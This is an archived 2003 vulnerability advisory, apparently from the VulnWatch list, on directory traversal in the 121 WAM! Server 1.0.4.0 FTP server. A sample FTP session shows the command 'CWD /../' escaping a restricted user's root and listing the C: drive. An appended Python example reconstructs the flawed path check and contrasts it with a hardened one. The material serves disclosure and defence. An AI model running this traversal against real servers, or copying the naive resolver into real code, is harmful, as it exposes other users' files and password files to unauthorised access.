[VulnWatch] Directory Traversal Vulnerability in 121 WAM! Server 1.0.4.0

From: Peter Winter-Smith (peter4020_at_hotmail.com)
Date: 08/06/03

    To: vulnwatch@vulnwatch.org, vuln@secunia.com, bugs@securitytracker.com
    Date: Wed, 06 Aug 2003 19:41:13 +0000
    
    

    Directory Traversal Vulnerability in 121 WAM! Server 1.0.4.0

    Url: http://www.121software.com/121wam/server.asp

    "Imagine if you could centralise the management of your FTP server farm and
    give customers additional database management capability."

    "121 WAM! Server is a standard FTP server for Microsoft Windows. When used
    in conjunction with 121 WAM! Client, it also provides your users with a
    complete solution to manage their online databases including Microsoft
    Access, SQL Server and MySQL. 121 WAM! makes uploading, downloading and
    transferring data a simple drag and drop operation. 121 WAM! Server is the
    first FTP server that supports database transfer functionality."
    - From the Vendor's Website

    It is possible to leave the root directory assigned to a restricted
    username and download any file on the remote computer.
    This can include, but is not limited to, the files of other users and
    password files on the main server.

    Sending the command:

    CWD ..

    Will not change the directory, however:

    CWD /../

    Will allow a restricted user to 'hop' out of the pre-defined user root
    directory, and browse the hard drive.

    Sample Session:
    ===============
    [ First I log in under 'guest', confined to directory 'c:\root' ]

    Microsoft Windows XP [Version 5.1.2600]
    (C) Copyright 1985-2001 Microsoft Corp.

    C:\WINDOWS\system32>ftp 82.35.22.2
    Connected to 82.35.22.2.
    220- ***** ***** ***** *****
    220- 121 WAM! Server Version 1. 0. 4. 0
    220- Get 121 WAM! Client for extra functionalities
    220- such as database operations
    220- Check out http://www.121software.com
    220- ***** ***** ***** *****
    220 Welcome to 121 WAM! Server
    User (82.35.22.2:(none)): guest
    331 User name okay, need password.
    Password:
    230 User logged in, proceed.
    ftp> dir
    200 Port command ok.
    150 Ready to transfer data.
    drwx------ 2 owner nogroup 0 May 21 13:46 repd
    -rwx------ 1 owner nogroup 10462 May 17 21:13 help.htm
    -rwx------ 1 owner nogroup 75264 May 18 14:39 ralf4.exe
    -rwx------ 1 owner nogroup 805 May 17 16:20 README.txt
    -rwx------ 1 owner nogroup 439 May 17 15:32 SETUP.bat
    drwx------ 2 owner nogroup 0 Jun 05 23:32 conf
    drwx------ 2 owner nogroup 0 Jun 06 00:11 docs
    drwx------ 2 owner nogroup 0 Jun 18 23:20 images
    226 File transfer complete.
    ftp: 534 bytes received in 0.06Seconds 8.48Kbytes/sec.
    ftp> cd ..
    250 CWD command completed successfully.
    ftp> dir
    200 Port command ok.
    150 Ready to transfer data.
    drwx------ 2 owner nogroup 0 May 21 13:46 repd
    -rwx------ 1 owner nogroup 10462 May 17 21:13 help.htm
    -rwx------ 1 owner nogroup 75264 May 18 14:39 ralf4.exe
    -rwx------ 1 owner nogroup 805 May 17 16:20 README.txt
    -rwx------ 1 owner nogroup 439 May 17 15:32 SETUP.bat
    drwx------ 2 owner nogroup 0 Jun 05 23:32 conf
    drwx------ 2 owner nogroup 0 Jun 06 00:11 docs
    drwx------ 2 owner nogroup 0 Jun 18 23:20 images
    226 File transfer complete.
    ftp: 534 bytes received in 0.06Seconds 8.48Kbytes/sec.

    [ As you can see, a regular 'cd ..' won't allow me to leave my root dir. ]

    ftp> cd /../
    250 CWD command completed successfully.
    ftp> dir
    200 Port command ok.
    150 Ready to transfer data.
    drwx------ 2 owner nogroup 0 May 10 16:18 WARM
    drwx------ 2 owner nogroup 0 Jul 15 2002 WINDOWS
    drwx------ 2 owner nogroup 0 Jul 15 2002 Documents and Settings
    [snip ...]
    drwx------ 2 owner nogroup 0 Jul 15 2002 Program Files
    -rwx------ 1 owner nogroup 0 Jul 15 2002 CONFIG.SYS
    -r-x------ 1 owner nogroup 5517 Jul 15 2002 CLDMA.LOG
    -rwx------ 1 owner nogroup 0 Jul 31 2002 CONFIG.WIN
    drwx------ 2 owner nogroup 0 Sep 28 2002 perlsetup
    [snip ...]
    drwx------ 2 owner nogroup 0 Jul 24 20:48 cygwin
    -rwx------ 1 owner nogroup 475136 Aug 29 2002 ASMEDIT
    -rwx------ 1 owner nogroup 17091 Sep 02 2002 gddreleasetemp
    226 File transfer complete.
    ftp: 17589 bytes received in 0.22Seconds 80.32Kbytes/sec.
    ftp>

    [ However, the 'cd /../' command got me straight to 'c:\'! ]

    ======================================================================

    Operating system and servicepack level:
    Windows 9x/Me/NT Based

    Software:
    121 WAM! Server 1.0.4.0 (Possibly previous versions)

    Under what circumstances the vulnerability was discovered:
    Under a vulnerability search.

    If the vendor has been notified:
    Yes, I think we can expect a patch some day soon :o)

    How to contact you for further information:
    I can always be reached at peter4020@hotmail.com

    Please credit this find to:
    Peter Winter-Smith

    Thank you for your time,
    -Peter
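
The confinement check that the sample session shows failing, as an added example that is not part of the original advisory and not the vendor's code. `naive_resolve` is an assumed reconstruction that merely reproduces the observed behaviour (`CWD ..` held at the root, `CWD /../` landing on `c:\`); `safe_resolve`, `ROOT` and the 550 reply texts are hypothetical names chosen for illustration.

```python
import ntpath
import posixpath
from pathlib import PureWindowsPath

ROOT = r"c:\root"  # constructed jail directory, as in the sample session


def naive_resolve(root, vcwd, arg):
    """Assumed flawed logic (not vendor code): only a bare relative '..' is clamped."""
    if arg.startswith("/"):
        # Absolute argument is glued onto the root and normalised afterwards,
        # so '/../' climbs one level above the root.
        return ntpath.normpath(root + arg)
    if arg == ".." and vcwd == "/":
        return ntpath.normpath(root)
    return ntpath.normpath(ntpath.join(root, vcwd.lstrip("/"), arg))


def safe_resolve(root, vcwd, arg):
    """Return (new_virtual_cwd, real_path); raise PermissionError on escape."""
    arg = arg.replace("\\", "/")
    # 1. Resolve inside the virtual namespace; normpath drops '..' at '/'.
    virtual = "/" + posixpath.normpath(posixpath.join(vcwd, arg)).lstrip("/")
    parts = [p for p in virtual.split("/") if p]
    # 2. Refuse drive letters and NTFS stream syntax in any component.
    if any(":" in p for p in parts):
        raise PermissionError("550 Invalid path")
    # 3. Map to the real tree, then re-check containment on the final path
    #    (lexical check only; a real server must also resolve links/junctions).
    real = PureWindowsPath(ntpath.normpath(ntpath.join(root, *parts)))
    jail = PureWindowsPath(root)
    if real != jail and jail not in real.parents:
        raise PermissionError("550 Permission denied")
    return virtual, str(real)
```

The hardened version canonicalises the client-supplied path before any access decision and checks containment on the final real path, so relative and absolute forms of `..` are treated identically.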
